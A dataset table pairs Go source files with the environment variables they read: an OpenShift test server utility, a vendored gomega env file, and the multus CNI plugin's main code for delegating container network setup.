| filename | content | environment | variablearg | constarg | variableargjson | constargjson | lang | constargcount | variableargcount | sentence |
|---|---|---|---|---|---|---|---|---|---|---|
| string (4-198 chars) | string (25-939k chars) | list | list | list | string (1 class) | string (2-3.9k chars) | string (3 classes) | float64 (0-129, nullable) | float64 (0-0, nullable) | string (1 class) |
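Each row below pairs a source file with the environment variables it references. Reading the columns against the rows, environment appears to hold every quoted variable-name literal as it occurs in the source, constarg the deduplicated names, constargjson the same names serialized as a JSON string, and constargcount the number of distinct names. As a minimal sketch of the pattern being indexed (this file is hypothetical and not part of the dataset), a Go program reading two constant-named variables would yield constargcount 2:

package main

import (
	"fmt"
	"os"
)

func main() {
	// Two lookups with constant (string-literal) names, so an indexer like the
	// one behind this dataset would record environment ["\"HOST\"", "\"PORT\""],
	// constarg ["HOST", "PORT"], and constargcount 2 for this file.
	host := os.Getenv("HOST")
	port := os.Getenv("PORT")
	fmt.Printf("listening on %s:%s\n", host, port)
}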
test/util/server.go
|
package util
import (
"errors"
"fmt"
"net"
"net/url"
"os"
"path"
"time"
"github.com/golang/glog"
"github.com/openshift/origin/pkg/cmd/server/bootstrappolicy"
kclient "k8s.io/kubernetes/pkg/client"
"k8s.io/kubernetes/pkg/fields"
"k8s.io/kubernetes/pkg/labels"
"k8s.io/kubernetes/pkg/util/wait"
"github.com/openshift/origin/pkg/client"
newproject "github.com/openshift/origin/pkg/cmd/admin/project"
"github.com/openshift/origin/pkg/cmd/server/admin"
configapi "github.com/openshift/origin/pkg/cmd/server/api"
"github.com/openshift/origin/pkg/cmd/server/start"
cmdutil "github.com/openshift/origin/pkg/cmd/util"
"github.com/openshift/origin/pkg/cmd/util/tokencmd"
)
// ServiceAccountWaitTimeout is used to determine how long to wait for the service account
// controllers to start up, and populate the service accounts in the test namespace
const ServiceAccountWaitTimeout = 30 * time.Second
// RequireServer verifies that etcd, Docker, and the OpenShift server are
// available and can be successfully connected to.
func RequireServer() {
RequireEtcd()
RequireDocker()
if _, err := GetClusterAdminClient(KubeConfigPath()); err != nil {
os.Exit(1)
}
}
// GetBaseDir returns the base directory used for test.
func GetBaseDir() string {
return cmdutil.Env("BASETMPDIR", path.Join(os.TempDir(), "openshift-"+Namespace()))
}
// FindAvailableBindAddress returns a bind address on 127.0.0.1 with a free port in the low-high range.
// If lowPort is 0, an ephemeral port is allocated.
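// An illustrative call (a sketch, not part of the original file; the range mirrors
// the master-address lookup further down in this file):
//
//	addr, err := FindAvailableBindAddress(8443, 8999)
//	if err != nil {
//		glog.Fatalf("Couldn't find free address for master: %v", err)
//	}
//	// addr has the form "127.0.0.1:<port>"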
func FindAvailableBindAddress(lowPort, highPort int) (string, error) {
if highPort < lowPort {
return "", errors.New("lowPort must be <= highPort")
}
for port := lowPort; port <= highPort; port++ {
l, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port))
if err != nil {
if port == 0 {
// Only get one shot to get an ephemeral port
return "", err
}
continue
}
defer l.Close()
return l.Addr().String(), nil
}
return "", fmt.Errorf("Could not find available port in the range %d-%d", lowPort, highPort)
}
func setupStartOptions() (*start.MasterArgs, *start.NodeArgs, *start.ListenArg, *start.ImageFormatArgs, *start.KubeConnectionArgs) {
masterArgs, nodeArgs, listenArg, imageFormatArgs, kubeConnectionArgs := start.GetAllInOneArgs()
basedir := GetBaseDir()
nodeArgs.VolumeDir = path.Join(basedir, "volume")
masterArgs.EtcdDir = path.Join(basedir, "etcd")
masterArgs.ConfigDir.Default(path.Join(basedir, "openshift.local.config", "master"))
nodeArgs.ConfigDir.Default(path.Join(basedir, "openshift.local.config", nodeArgs.NodeName))
nodeArgs.MasterCertDir = masterArgs.ConfigDir.Value()
// don't wait for nodes to come up
masterAddr := os.Getenv("OS_MASTER_ADDR")
if len(masterAddr) == 0 {
if addr, err := FindAvailableBindAddress(8443, 8999); err != nil {
glog.Fatalf("Couldn't find free address for master: %v", err)
} else {
masterAddr = addr
}
}
fmt.Printf("masterAddr: %#v\n", masterAddr)
masterArgs.MasterAddr.Set(masterAddr)
listenArg.ListenAddr.Set(masterAddr)
masterArgs.EtcdAddr.Set(GetEtcdURL())
dnsAddr := os.Getenv("OS_DNS_ADDR")
if len(dnsAddr) == 0 {
if addr, err := FindAvailableBindAddress(8053, 8100); err != nil {
glog.Fatalf("Couldn't find free address for DNS: %v", err)
} else {
dnsAddr = addr
}
}
fmt.Printf("dnsAddr: %#v\n", dnsAddr)
masterArgs.DNSBindAddr.Set(dnsAddr)
return masterArgs, nodeArgs, listenArg, imageFormatArgs, kubeConnectionArgs
}
func DefaultMasterOptions() (*configapi.MasterConfig, error) {
startOptions := start.MasterOptions{}
startOptions.MasterArgs, _, _, _, _ = setupStartOptions()
startOptions.Complete()
startOptions.MasterArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", "master"))
if err := CreateMasterCerts(startOptions.MasterArgs); err != nil {
return nil, err
}
if err := CreateBootstrapPolicy(startOptions.MasterArgs); err != nil {
return nil, err
}
masterConfig, err := startOptions.MasterArgs.BuildSerializeableMasterConfig()
if err != nil {
return nil, err
}
// force strict handling of service account secret references by default, so that all our examples and controllers will handle it.
masterConfig.ServiceAccountConfig.LimitSecretReferences = true
return masterConfig, nil
}
func CreateBootstrapPolicy(masterArgs *start.MasterArgs) error {
createBootstrapPolicy := &admin.CreateBootstrapPolicyFileOptions{
File: path.Join(masterArgs.ConfigDir.Value(), "policy.json"),
OpenShiftSharedResourcesNamespace: "openshift",
}
if err := createBootstrapPolicy.Validate(nil); err != nil {
return err
}
if err := createBootstrapPolicy.CreateBootstrapPolicyFile(); err != nil {
return err
}
return nil
}
func CreateMasterCerts(masterArgs *start.MasterArgs) error {
hostnames, err := masterArgs.GetServerCertHostnames()
if err != nil {
return err
}
masterURL, err := masterArgs.GetMasterAddress()
if err != nil {
return err
}
publicMasterURL, err := masterArgs.GetMasterPublicAddress()
if err != nil {
return err
}
createMasterCerts := admin.CreateMasterCertsOptions{
CertDir: masterArgs.ConfigDir.Value(),
SignerName: admin.DefaultSignerName(),
Hostnames: hostnames.List(),
APIServerURL: masterURL.String(),
PublicAPIServerURL: publicMasterURL.String(),
Output: os.Stderr,
}
if err := createMasterCerts.Validate(nil); err != nil {
return err
}
if err := createMasterCerts.CreateMasterCerts(); err != nil {
return err
}
return nil
}
func CreateNodeCerts(nodeArgs *start.NodeArgs) error {
getSignerOptions := &admin.SignerCertOptions{
CertFile: admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca"),
KeyFile: admin.DefaultKeyFilename(nodeArgs.MasterCertDir, "ca"),
SerialFile: admin.DefaultSerialFilename(nodeArgs.MasterCertDir, "ca"),
}
createNodeConfig := admin.NewDefaultCreateNodeConfigOptions()
createNodeConfig.Output = os.Stdout
createNodeConfig.SignerCertOptions = getSignerOptions
createNodeConfig.NodeConfigDir = nodeArgs.ConfigDir.Value()
createNodeConfig.NodeName = nodeArgs.NodeName
createNodeConfig.Hostnames = []string{nodeArgs.NodeName}
createNodeConfig.ListenAddr = nodeArgs.ListenArg.ListenAddr
createNodeConfig.APIServerCAFile = admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca")
createNodeConfig.NodeClientCAFile = admin.DefaultCertFilename(nodeArgs.MasterCertDir, "ca")
if err := createNodeConfig.Validate(nil); err != nil {
return err
}
if err := createNodeConfig.CreateNodeFolder(); err != nil {
return err
}
return nil
}
func DefaultAllInOneOptions() (*configapi.MasterConfig, *configapi.NodeConfig, error) {
startOptions := start.AllInOneOptions{MasterOptions: &start.MasterOptions{}, NodeArgs: &start.NodeArgs{}}
startOptions.MasterOptions.MasterArgs, startOptions.NodeArgs, _, _, _ = setupStartOptions()
startOptions.MasterOptions.MasterArgs.NodeList = nil
startOptions.NodeArgs.AllowDisabledDocker = true
startOptions.Complete()
startOptions.MasterOptions.MasterArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", "master"))
startOptions.NodeArgs.ConfigDir.Default(path.Join(GetBaseDir(), "openshift.local.config", admin.DefaultNodeDir(startOptions.NodeArgs.NodeName)))
startOptions.NodeArgs.MasterCertDir = startOptions.MasterOptions.MasterArgs.ConfigDir.Value()
if err := CreateMasterCerts(startOptions.MasterOptions.MasterArgs); err != nil {
return nil, nil, err
}
if err := CreateBootstrapPolicy(startOptions.MasterOptions.MasterArgs); err != nil {
return nil, nil, err
}
if err := CreateNodeCerts(startOptions.NodeArgs); err != nil {
return nil, nil, err
}
masterOptions, err := startOptions.MasterOptions.MasterArgs.BuildSerializeableMasterConfig()
if err != nil {
return nil, nil, err
}
nodeOptions, err := startOptions.NodeArgs.BuildSerializeableNodeConfig()
if err != nil {
return nil, nil, err
}
return masterOptions, nodeOptions, nil
}
func StartConfiguredAllInOne(masterConfig *configapi.MasterConfig, nodeConfig *configapi.NodeConfig) (string, error) {
adminKubeConfigFile, err := StartConfiguredMaster(masterConfig)
if err != nil {
return "", err
}
if err := start.StartNode(*nodeConfig); err != nil {
return "", err
}
return adminKubeConfigFile, nil
}
func StartTestAllInOne() (*configapi.MasterConfig, *configapi.NodeConfig, string, error) {
master, node, err := DefaultAllInOneOptions()
if err != nil {
return nil, nil, "", err
}
adminKubeConfigFile, err := StartConfiguredAllInOne(master, node)
return master, node, adminKubeConfigFile, err
}
type TestOptions struct {
DeleteAllEtcdKeys bool
}
func DefaultTestOptions() TestOptions {
return TestOptions{true}
}
func StartConfiguredMaster(masterConfig *configapi.MasterConfig) (string, error) {
return StartConfiguredMasterWithOptions(masterConfig, DefaultTestOptions())
}
func StartConfiguredMasterWithOptions(masterConfig *configapi.MasterConfig, testOptions TestOptions) (string, error) {
if testOptions.DeleteAllEtcdKeys {
DeleteAllEtcdKeys()
}
if err := start.NewMaster(masterConfig, true, true).Start(); err != nil {
return "", err
}
adminKubeConfigFile := KubeConfigPath()
clientConfig, err := GetClusterAdminClientConfig(adminKubeConfigFile)
if err != nil {
return "", err
}
masterURL, err := url.Parse(clientConfig.Host)
if err != nil {
return "", err
}
// wait for the server to come up: 35 seconds
if err := cmdutil.WaitForSuccessfulDial(true, "tcp", masterURL.Host, 100*time.Millisecond, 1*time.Second, 35); err != nil {
return "", err
}
for {
// confirm that we can actually query from the api server
if client, err := GetClusterAdminClient(adminKubeConfigFile); err == nil {
if _, err := client.ClusterPolicies().List(labels.Everything(), fields.Everything()); err == nil {
break
}
}
time.Sleep(100 * time.Millisecond)
}
return adminKubeConfigFile, nil
}
// StartTestMaster starts up a test master and returns the startOptions so you can get clients and certs
func StartTestMaster() (*configapi.MasterConfig, string, error) {
master, err := DefaultMasterOptions()
if err != nil {
return nil, "", err
}
adminKubeConfigFile, err := StartConfiguredMaster(master)
return master, adminKubeConfigFile, err
}
func WaitForServiceAccounts(client *kclient.Client, namespace string, accounts []string) error {
// Ensure the service accounts needed by build pods exist in the namespace
// The extra controllers tend to starve the service account controller
serviceAccounts := client.ServiceAccounts(namespace)
return wait.Poll(time.Second, ServiceAccountWaitTimeout, func() (bool, error) {
for _, account := range accounts {
if _, err := serviceAccounts.Get(account); err != nil {
return false, nil
}
}
return true, nil
})
}
// CreateNewProject creates a new project using the clusterAdminClient, then gets a token for the adminUser and returns
// a client for the admin user
func CreateNewProject(clusterAdminClient *client.Client, clientConfig kclient.Config, projectName, adminUser string) (*client.Client, error) {
newProjectOptions := &newproject.NewProjectOptions{
Client: clusterAdminClient,
ProjectName: projectName,
AdminRole: bootstrappolicy.AdminRoleName,
AdminUser: adminUser,
}
if err := newProjectOptions.Run(false); err != nil {
return nil, err
}
client, _, _, err := GetClientForUser(clientConfig, adminUser)
return client, err
}
func GetClientForUser(clientConfig kclient.Config, username string) (*client.Client, *kclient.Client, *kclient.Config, error) {
token, err := tokencmd.RequestToken(&clientConfig, nil, username, "password")
if err != nil {
return nil, nil, nil, err
}
userClientConfig := clientConfig
userClientConfig.BearerToken = token
userClientConfig.Username = ""
userClientConfig.Password = ""
userClientConfig.TLSClientConfig.CertFile = ""
userClientConfig.TLSClientConfig.KeyFile = ""
userClientConfig.TLSClientConfig.CertData = nil
userClientConfig.TLSClientConfig.KeyData = nil
kubeClient, err := kclient.New(&userClientConfig)
if err != nil {
return nil, nil, nil, err
}
osClient, err := client.New(&userClientConfig)
if err != nil {
return nil, nil, nil, err
}
return osClient, kubeClient, &userClientConfig, nil
}
|
environment: ["\"OS_MASTER_ADDR\"", "\"OS_DNS_ADDR\""] | variablearg: [] | constarg: ["OS_DNS_ADDR", "OS_MASTER_ADDR"] | variableargjson: [] | constargjson: ["OS_DNS_ADDR", "OS_MASTER_ADDR"] | lang: go | constargcount: 2 | variableargcount: 0 | sentence: ""
vendor/github.com/onsi/gomega/env.go
|
package gomega
import (
"os"
"github.com/onsi/gomega/internal/defaults"
)
const (
ConsistentlyDurationEnvVarName = "GOMEGA_DEFAULT_CONSISTENTLY_DURATION"
ConsistentlyPollingIntervalEnvVarName = "GOMEGA_DEFAULT_CONSISTENTLY_POLLING_INTERVAL"
EventuallyTimeoutEnvVarName = "GOMEGA_DEFAULT_EVENTUALLY_TIMEOUT"
EventuallyPollingIntervalEnvVarName = "GOMEGA_DEFAULT_EVENTUALLY_POLLING_INTERVAL"
)
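// Illustrative usage (an assumption, since the parsing lives in the internal
// defaults package; the values are expected to be Go duration strings):
//
//	GOMEGA_DEFAULT_EVENTUALLY_TIMEOUT=30s \
//	GOMEGA_DEFAULT_EVENTUALLY_POLLING_INTERVAL=250ms \
//	go test ./...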
func init() {
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultConsistentlyDuration,
ConsistentlyDurationEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultConsistentlyPollingInterval,
ConsistentlyPollingIntervalEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultEventuallyTimeout,
EventuallyTimeoutEnvVarName,
)
defaults.SetDurationFromEnv(
os.Getenv,
SetDefaultEventuallyPollingInterval,
EventuallyPollingIntervalEnvVarName,
)
}
|
environment: [] | variablearg: [] | constarg: [] | variableargjson: [] | constargjson: [] | lang: go | constargcount: 0 | variableargcount: 0 | sentence: ""
multus/multus.go
|
// Copyright (c) 2017 Intel Corporation
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// This is a "Multi-plugin".The delegate concept refered from CNI project
// It reads other plugin netconf, and then invoke them, e.g.
// flannel or sriov plugin.
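// As a rough sketch of that idea (the values below are illustrative, not taken
// from this repository), each delegate wraps a complete CNI config that multus
// hands to the named plugin:
//
//	{
//	  "cniVersion": "0.3.1",
//	  "name": "flannel-network",
//	  "type": "flannel"
//	}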
package main
import (
"context"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"net"
"os"
"path/filepath"
"strings"
"time"
"github.com/containernetworking/cni/libcni"
"github.com/containernetworking/cni/pkg/invoke"
"github.com/containernetworking/cni/pkg/skel"
cnitypes "github.com/containernetworking/cni/pkg/types"
cniversion "github.com/containernetworking/cni/pkg/version"
"github.com/containernetworking/plugins/pkg/ns"
k8s "github.com/intel/multus-cni/k8sclient"
"github.com/intel/multus-cni/logging"
"github.com/intel/multus-cni/netutils"
"github.com/intel/multus-cni/types"
nettypes "github.com/k8snetworkplumbingwg/network-attachment-definition-client/pkg/apis/k8s.cni.cncf.io/v1"
nadutils "github.com/k8snetworkplumbingwg/network-attachment-definition-client/pkg/utils"
"github.com/vishvananda/netlink"
"k8s.io/apimachinery/pkg/util/wait"
)
var version = "master@git"
var commit = "unknown commit"
var date = "unknown date"
var defaultReadinessBackoff = wait.Backoff{
Steps: 4,
Duration: 250 * time.Millisecond,
Factor: 4.0,
Jitter: 0.1,
}
func printVersionString() string {
return fmt.Sprintf("multus-cni version:%s, commit:%s, date:%s",
version, commit, date)
}
func saveScratchNetConf(containerID, dataDir string, netconf []byte) error {
logging.Debugf("saveScratchNetConf: %s, %s, %s", containerID, dataDir, string(netconf))
if err := os.MkdirAll(dataDir, 0700); err != nil {
return logging.Errorf("saveScratchNetConf: failed to create the multus data directory(%q): %v", dataDir, err)
}
path := filepath.Join(dataDir, containerID)
err := ioutil.WriteFile(path, netconf, 0600)
if err != nil {
return logging.Errorf("saveScratchNetConf: failed to write container data in the path(%q): %v", path, err)
}
return err
}
func consumeScratchNetConf(containerID, dataDir string) ([]byte, string, error) {
logging.Debugf("consumeScratchNetConf: %s, %s", containerID, dataDir)
path := filepath.Join(dataDir, containerID)
b, err := ioutil.ReadFile(path)
return b, path, err
}
func getIfname(delegate *types.DelegateNetConf, argif string, idx int) string {
logging.Debugf("getIfname: %v, %s, %d", delegate, argif, idx)
if delegate.IfnameRequest != "" {
return delegate.IfnameRequest
}
if delegate.MasterPlugin {
// master plugin always uses the CNI-provided interface name
return argif
}
// Otherwise construct a unique interface name from the delegate's
// position in the delegate list
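// For example (illustrative): with the CNI-provided name "eth0", the master
// plugin keeps "eth0", while delegates at positions 1 and 2 become "net1" and "net2".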
return fmt.Sprintf("net%d", idx)
}
func saveDelegates(containerID, dataDir string, delegates []*types.DelegateNetConf) error {
logging.Debugf("saveDelegates: %s, %s, %v", containerID, dataDir, delegates)
delegatesBytes, err := json.Marshal(delegates)
if err != nil {
return logging.Errorf("saveDelegates: error serializing delegate netconf: %v", err)
}
if err = saveScratchNetConf(containerID, dataDir, delegatesBytes); err != nil {
return logging.Errorf("saveDelegates: error in saving the delegates : %v", err)
}
return err
}
func deleteDelegates(containerID, dataDir string) error {
logging.Debugf("deleteDelegates: %s, %s", containerID, dataDir)
path := filepath.Join(dataDir, containerID)
if err := os.Remove(path); err != nil {
return logging.Errorf("deleteDelegates: error in deleting the delegates : %v", err)
}
return nil
}
func validateIfName(nsname string, ifname string) error {
logging.Debugf("validateIfName: %s, %s", nsname, ifname)
podNs, err := ns.GetNS(nsname)
if err != nil {
return logging.Errorf("validateIfName: no net namespace %s found: %v", nsname, err)
}
err = podNs.Do(func(_ ns.NetNS) error {
_, err := netlink.LinkByName(ifname)
if err != nil {
if err.Error() == "Link not found" {
return nil
}
return err
}
return logging.Errorf("validateIfName: interface name %s already exists", ifname)
})
return err
}
func confAdd(rt *libcni.RuntimeConf, rawNetconf []byte, binDir string, exec invoke.Exec) (cnitypes.Result, error) {
logging.Debugf("conflistAdd: %v, %s, %s", rt, string(rawNetconf), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
conf, err := libcni.ConfFromBytes(rawNetconf)
if err != nil {
return nil, logging.Errorf("error in converting the raw bytes to conf: %v", err)
}
result, err := cniNet.AddNetwork(context.Background(), conf, rt)
if err != nil {
return nil, logging.Errorf("error in getting result from AddNetwork: %v", err)
}
return result, nil
}
func confDel(rt *libcni.RuntimeConf, rawNetconf []byte, binDir string, exec invoke.Exec) error {
logging.Debugf("conflistDel: %v, %s, %s", rt, string(rawNetconf), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
conf, err := libcni.ConfFromBytes(rawNetconf)
if err != nil {
return logging.Errorf("error in converting the raw bytes to conf: %v", err)
}
err = cniNet.DelNetwork(context.Background(), conf, rt)
if err != nil {
return logging.Errorf("error in getting result from DelNetwork: %v", err)
}
return err
}
func conflistAdd(rt *libcni.RuntimeConf, rawnetconflist []byte, binDir string, exec invoke.Exec) (cnitypes.Result, error) {
logging.Debugf("conflistAdd: %v, %s, %s", rt, string(rawnetconflist), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
confList, err := libcni.ConfListFromBytes(rawnetconflist)
if err != nil {
return nil, logging.Errorf("conflistAdd: error converting the raw bytes into a conflist: %v", err)
}
result, err := cniNet.AddNetworkList(context.Background(), confList, rt)
if err != nil {
return nil, logging.Errorf("conflistAdd: error in getting result from AddNetworkList: %v", err)
}
return result, nil
}
func conflistDel(rt *libcni.RuntimeConf, rawnetconflist []byte, binDir string, exec invoke.Exec) error {
logging.Debugf("conflistDel: %v, %s, %s", rt, string(rawnetconflist), binDir)
// In part, adapted from K8s pkg/kubelet/dockershim/network/cni/cni.go
binDirs := filepath.SplitList(os.Getenv("CNI_PATH"))
binDirs = append([]string{binDir}, binDirs...)
cniNet := libcni.NewCNIConfig(binDirs, exec)
confList, err := libcni.ConfListFromBytes(rawnetconflist)
if err != nil {
return logging.Errorf("conflistDel: error converting the raw bytes into a conflist: %v", err)
}
err = cniNet.DelNetworkList(context.Background(), confList, rt)
if err != nil {
return logging.Errorf("conflistDel: error in getting result from DelNetworkList: %v", err)
}
return err
}
func delegateAdd(exec invoke.Exec, ifName string, delegate *types.DelegateNetConf, rt *libcni.RuntimeConf, binDir string, cniArgs string) (cnitypes.Result, error) {
logging.Debugf("delegateAdd: %v, %s, %v, %v, %s", exec, ifName, delegate, rt, binDir)
if os.Setenv("CNI_IFNAME", ifName) != nil {
return nil, logging.Errorf("delegateAdd: error setting envionment variable CNI_IFNAME")
}
if err := validateIfName(os.Getenv("CNI_NETNS"), ifName); err != nil {
return nil, logging.Errorf("delegateAdd: cannot set %q interface name to %q: %v", delegate.Conf.Type, ifName, err)
}
// Deprecated in ver 3.5.
if delegate.MacRequest != "" || delegate.IPRequest != nil {
if cniArgs != "" {
cniArgs = fmt.Sprintf("%s;IgnoreUnknown=true", cniArgs)
} else {
cniArgs = "IgnoreUnknown=true"
}
if delegate.MacRequest != "" {
// validate Mac address
_, err := net.ParseMAC(delegate.MacRequest)
if err != nil {
return nil, logging.Errorf("delegateAdd: failed to parse mac address %q", delegate.MacRequest)
}
cniArgs = fmt.Sprintf("%s;MAC=%s", cniArgs, delegate.MacRequest)
logging.Debugf("delegateAdd: set MAC address %q to %q", delegate.MacRequest, ifName)
rt.Args = append(rt.Args, [2]string{"MAC", delegate.MacRequest})
}
if delegate.IPRequest != nil {
// validate IP address
for _, ip := range delegate.IPRequest {
if strings.Contains(ip, "/") {
_, _, err := net.ParseCIDR(ip)
if err != nil {
return nil, logging.Errorf("delegateAdd: failed to parse IP address %q", ip)
}
} else if net.ParseIP(ip) == nil {
return nil, logging.Errorf("delegateAdd: failed to parse IP address %q", ip)
}
}
ips := strings.Join(delegate.IPRequest, ",")
cniArgs = fmt.Sprintf("%s;IP=%s", cniArgs, ips)
logging.Debugf("delegateAdd: set IP address %q to %q", ips, ifName)
rt.Args = append(rt.Args, [2]string{"IP", ips})
}
}
var result cnitypes.Result
var err error
if delegate.ConfListPlugin {
result, err = conflistAdd(rt, delegate.Bytes, binDir, exec)
if err != nil {
return nil, logging.Errorf("delegateAdd: error invoking conflistAdd - %q: %v", delegate.ConfList.Name, err)
}
} else {
result, err = confAdd(rt, delegate.Bytes, binDir, exec)
if err != nil {
return nil, logging.Errorf("delegateAdd: error invoking DelegateAdd - %q: %v", delegate.Conf.Type, err)
}
}
if logging.GetLoggingLevel() >= logging.VerboseLevel {
data, _ := json.Marshal(result)
var confName string
if delegate.ConfListPlugin {
confName = delegate.ConfList.Name
} else {
confName = delegate.Conf.Name
}
logging.Verbosef("Add: %s:%s:%s:%s %s", rt.Args[1][1], rt.Args[2][1], confName, rt.IfName, string(data))
}
return result, nil
}
func delegateDel(exec invoke.Exec, ifName string, delegateConf *types.DelegateNetConf, rt *libcni.RuntimeConf, binDir string) error {
logging.Debugf("delegateDel: %v, %s, %v, %v, %s", exec, ifName, delegateConf, rt, binDir)
if os.Setenv("CNI_IFNAME", ifName) != nil {
return logging.Errorf("delegateDel: error setting envionment variable CNI_IFNAME")
}
if logging.GetLoggingLevel() >= logging.VerboseLevel {
var confName string
if delegateConf.ConfListPlugin {
confName = delegateConf.ConfList.Name
} else {
confName = delegateConf.Conf.Name
}
logging.Verbosef("Del: %s:%s:%s:%s %s", rt.Args[1][1], rt.Args[2][1], confName, rt.IfName, string(delegateConf.Bytes))
}
var err error
if delegateConf.ConfListPlugin {
err = conflistDel(rt, delegateConf.Bytes, binDir, exec)
if err != nil {
return logging.Errorf("delegateDel: error invoking ConflistDel - %q: %v", delegateConf.ConfList.Name, err)
}
} else {
err = confDel(rt, delegateConf.Bytes, binDir, exec)
if err != nil {
return logging.Errorf("delegateDel: error invoking DelegateDel - %q: %v", delegateConf.Conf.Type, err)
}
}
return err
}
func delPlugins(exec invoke.Exec, argIfname string, delegates []*types.DelegateNetConf, lastIdx int, rt *libcni.RuntimeConf, binDir string) error {
logging.Debugf("delPlugins: %v, %s, %v, %d, %v, %s", exec, argIfname, delegates, lastIdx, rt, binDir)
if os.Setenv("CNI_COMMAND", "DEL") != nil {
return logging.Errorf("delPlugins: error setting envionment variable CNI_COMMAND to a value of DEL")
}
var errorstrings []string
for idx := lastIdx; idx >= 0; idx-- {
ifName := getIfname(delegates[idx], argIfname, idx)
rt.IfName = ifName
// Attempt to delete all but do not error out, instead, collect all errors.
if err := delegateDel(exec, ifName, delegates[idx], rt, binDir); err != nil {
errorstrings = append(errorstrings, err.Error())
}
}
// Check if we had any errors, and send them all back.
if len(errorstrings) > 0 {
return fmt.Errorf(strings.Join(errorstrings, " / "))
}
return nil
}
func cmdErr(k8sArgs *types.K8sArgs, format string, args ...interface{}) error {
prefix := "Multus: "
if k8sArgs != nil {
prefix += fmt.Sprintf("[%s/%s]: ", k8sArgs.K8S_POD_NAMESPACE, k8sArgs.K8S_POD_NAME)
}
return logging.Errorf(prefix+format, args...)
}
func cmdAdd(args *skel.CmdArgs, exec invoke.Exec, kubeClient *k8s.ClientInfo) (cnitypes.Result, error) {
n, err := types.LoadNetConf(args.StdinData)
logging.Debugf("cmdAdd: %v, %v, %v", args, exec, kubeClient)
if err != nil {
return nil, cmdErr(nil, "error loading netconf: %v", err)
}
k8sArgs, err := k8s.GetK8sArgs(args)
if err != nil {
return nil, cmdErr(nil, "error getting k8s args: %v", err)
}
wait.ExponentialBackoff(defaultReadinessBackoff, func() (bool, error) {
_, err := os.Stat(n.ReadinessIndicatorFile)
switch {
case err == nil:
return true, nil
default:
return false, nil
}
})
if n.ClusterNetwork != "" {
err = k8s.GetDefaultNetworks(k8sArgs, n, kubeClient)
if err != nil {
return nil, cmdErr(k8sArgs, "failed to get clusterNetwork/defaultNetworks: %v", err)
}
// First delegate is always the master plugin
n.Delegates[0].MasterPlugin = true
}
_, kc, err := k8s.TryLoadPodDelegates(k8sArgs, n, kubeClient)
if err != nil {
return nil, cmdErr(k8sArgs, "error loading k8s delegates k8s args: %v", err)
}
// cache the multus config
if err := saveDelegates(args.ContainerID, n.CNIDir, n.Delegates); err != nil {
return nil, cmdErr(k8sArgs, "error saving the delegates: %v", err)
}
var result, tmpResult cnitypes.Result
var netStatus []nettypes.NetworkStatus
cniArgs := os.Getenv("CNI_ARGS")
for idx, delegate := range n.Delegates {
ifName := getIfname(delegate, args.IfName, idx)
runtimeConfig := types.MergeCNIRuntimeConfig(n.RuntimeConfig, delegate)
rt := types.CreateCNIRuntimeConf(args, k8sArgs, ifName, runtimeConfig)
tmpResult, err = delegateAdd(exec, ifName, delegate, rt, n.BinDir, cniArgs)
if err != nil {
// If the add failed, tear down all networks we already added
netName := delegate.Conf.Name
if netName == "" {
netName = delegate.ConfList.Name
}
// Ignore errors; DEL must be idempotent anyway
_ = delPlugins(exec, args.IfName, n.Delegates, idx, rt, n.BinDir)
return nil, cmdErr(k8sArgs, "error adding container to network %q: %v", netName, err)
}
// Remove gateway from routing table if the gateway is not used
deletegateway := false
adddefaultgateway := false
if delegate.IsFilterGateway {
deletegateway = true
logging.Debugf("Marked interface %v for gateway deletion", ifName)
} else {
// Otherwise, determine if this interface now gets our default route.
if delegate.GatewayRequest != nil {
deletegateway = true
adddefaultgateway = true
logging.Debugf("Detected gateway override on interface %v to %v", ifName, delegate.GatewayRequest)
}
}
if deletegateway {
tmpResult, err = netutils.DeleteDefaultGW(args, ifName, &tmpResult)
if err != nil {
return nil, cmdErr(k8sArgs, "error deleting default gateway: %v", err)
}
}
// Here we'll set the default gateway
if adddefaultgateway {
tmpResult, err = netutils.SetDefaultGW(args, ifName, delegate.GatewayRequest, &tmpResult)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting default gateway: %v", err)
}
}
// Master plugin result is always used if present
if delegate.MasterPlugin || result == nil {
result = tmpResult
}
// create the network status, but only when Multus has a kubeconfig
if n.Kubeconfig != "" && kc != nil {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAME), n.SystemNamespaces) {
delegateNetStatus, err := nadutils.CreateNetworkStatus(tmpResult, delegate.Conf.Name, delegate.MasterPlugin)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting network status: %v", err)
}
netStatus = append(netStatus, *delegateNetStatus)
}
}
}
// set the network status annotation in the apiserver, but only when Multus has a kubeconfig
if n.Kubeconfig != "" && kc != nil {
if !types.CheckSystemNamespaces(string(k8sArgs.K8S_POD_NAME), n.SystemNamespaces) {
err = k8s.SetNetworkStatus(kubeClient, k8sArgs, netStatus, n)
if err != nil {
return nil, cmdErr(k8sArgs, "error setting the networks status: %v", err)
}
}
}
return result, nil
}
